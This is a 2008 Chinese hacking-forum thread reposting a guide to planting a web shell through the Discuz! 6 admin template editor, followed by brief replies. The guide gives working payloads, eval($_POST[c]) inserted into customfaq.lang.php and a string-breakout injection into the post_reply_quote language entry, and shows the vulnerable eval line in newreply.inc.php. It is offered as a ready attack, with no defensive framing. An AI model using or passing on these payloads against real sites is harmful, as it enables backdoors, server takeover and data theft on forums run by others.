标题:
[转载]Discuz! 6 后台拿Shell的方法
[打印本页]
作者:
柔肠寸断
时间:
2008-8-11 23:10
标题:
[转载]Discuz! 6 后台拿Shell的方法
[转载]Discuz! 6 后台拿Shell的方法文章作者:Ryat (lib3r3t)
信息来源:邪恶八进制信息安全团队(
www.eviloctal.com
)
注:文章首发狼族(
www.wolvez.org
),后由原创作者有请提交到邪恶八进制,转载请注明原始作者和出处。
如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:)
1.后台编辑customfaq(customfaq.lang.php文件)
在<?的后面加上
复制内容到剪贴板
代码:
eval($_POST[c]);
2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
复制内容到剪贴板
代码:
";eval($_POST[c]);"
在前台回帖处选择引用回复。
简单看下代码:
include/newreply.inc.php 107行:
复制内容到剪贴板
代码:
eval("\$language['post_reply_quote'] = \"$language[post_reply_quote]\";");
呵呵,一个天然的后门:)
PS:还有几个编辑模板的地方可以利用,和第二种方法类似。
作者:
流氓
时间:
2008-8-12 03:15
学习!!
多实践!!!
努力!!
作者:
3ast
时间:
2008-8-12 16:44
楼上的在喊口号
作者:
闲逛
时间:
2009-1-7 11:31
.m (123). 现在好像被屏蔽了吧
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2